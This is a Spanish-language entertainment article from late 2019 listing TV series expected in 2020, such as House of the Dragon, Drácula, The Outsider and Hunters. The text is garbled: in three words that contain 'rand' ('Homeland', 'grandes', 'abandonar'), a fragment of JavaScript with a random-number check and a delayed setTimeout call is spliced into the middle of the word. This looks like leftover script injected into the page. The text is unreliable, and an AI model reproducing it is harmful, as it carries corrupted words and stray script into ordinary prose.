Las series más esperadas del 2020

    Las series más esperadas del 2020

    Todas suenan genial.

    Autor: Elizabeth Rivera 26 diciembre, 2019



    Amazon Prime video

     

     

    ¿Qué ver en la TV 2020?

     

    Ya estamos listos para ver lo que el mundo de la series nos tiene preparado para el año que está por comenzar. Nos pusimos a investigar un poco y aquí te vamos a dar nuestras recomendaciones sobre lo que se viene. 

     

    Además, no te olvides que viene la cuarta temporada de Fargo y Better Call Saul, así como el regreso de la temporada 10B de The Walking Dead o el desenlace de la serie Homelandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and.

     

     

    El señor de los anillos (Amazon Prime)

     

     

    Aunque todavía no hay fecha para su estreno, El señor de los anillos es una de las más esperadas y la gran apuesta de Amazon Prime para 2020.

     

    La serie se centrará en lo que se conoce como la Segunda Edad, esto es, el momento en el que Sauron forjará los anillos de poder.

     

     

     

    The Walking Dead: World Beyond (AMC)

    La serie dará un gran salto temporal hacia el futuro a una época en la que vuelven a prosperar las ciudades, convertidas ahora en grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes refugios anti zombies.

     

    Para darle un twist interesante a la historia, unos personajes más jóvenes decidirán abandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andonar la tranquilidad de la ciudad para adentrarse en el bosque. La actriz Julia Ormond será quien lidere a una especie de grupo paramilitar.

     

     

     

     

    Game of Thrones: House of the Dragon (HBO)

     

    La primera secuela de Juego de tronos se centrará en la familia Targaryen. La fecha de estreno no es segura para el 2020 pero sí para inicios del 2021.

     

     

    Wild Cards (Hulu)

     

    Una obra distópica en el que un virus transforma a parte de la población, confiriéndole rasgos de animales salvajes. Una historia muy al estilo del cine negro de los años cincuenta que además ha sido escrita por el mismísimo George R.R. Martin. ¡No podemos esperar!

     

     

     

     

    Drácula (BBC y Netflix)

     

     

    Detrás de este proyecto se encuentran los creadores de la magnífica serie Sherlock: Mark Gatiss y Steven Moffat.

     

    Drácula, se estrenará en la BBC y después se podrá ver en Netflix. Como todas las series británicas, de momento contará con una temporada de sólo 3 episodios de duración.

     

     

     

     

    The outsider (HBO)

     

    Thriller policíaco basada en la novela homónima de Stephen King cuyo relato se centra en el asesinato de un niño en un pequeño pueblo de Georgia y una serie de sucesos misteriosos.

     

     

    The White House Plumbers (HBO)

     

    Una de las series más esperadas que podría colocarse junto a otras joyas como Chernobyl, Generation Kill o Heridas abiertas.

     

    La serie narra el escándalo del Watergate que sacudió la Casa Blanca y conmocionó a la opinión pública norteamericana, contado desde las perspectiva de los periodistas que destaparon el escándalo de las escuchas ilegales de Nixon casi por casualidad.

     

    En el reparto está Woody Harrelson y Justin Theroux.

     

     

    American Crime Story: Impeachment (FX)

     

    Tras el caso de O.J. Simpson y el asesinato de Versace, Ryan Murphy vuelve con la tercera entrega de esta serie que analiza algunos de los escándalos más sonados de la historia reciente de Estados Unidos.

     

    En esta entrega, Clive Owen es Bill Clinton en el caso de Monica Lewinsky. Un episodio político que provocó el segundo impeachment a un presidente de los Estados Unidos. 

     

     

     

    Hunters (Amazon Prime)

     

     

    Jordan Peele (Déjame Salir, Us) director de moda en Hollywood tomará las riendas de este proyecto y Al Pacino participará en un papel protagónico.

     

    La serie trata sobre un grupo de jóvenes que intentarán atrapar a neonazis a finales de los años setenta para desarticular una red que trata de instaurar el Cuarto Reich en Estados Unidos. 

     

     

     

    Si no quieres esperar tanto tiempo, aquí te dejamos los ESTRENOS DE NETFLIX EN ENERO DE 2020 EN MÉXICO.

     

     

    Temas relacionados con esta nota: , ,

Todas suenan genial.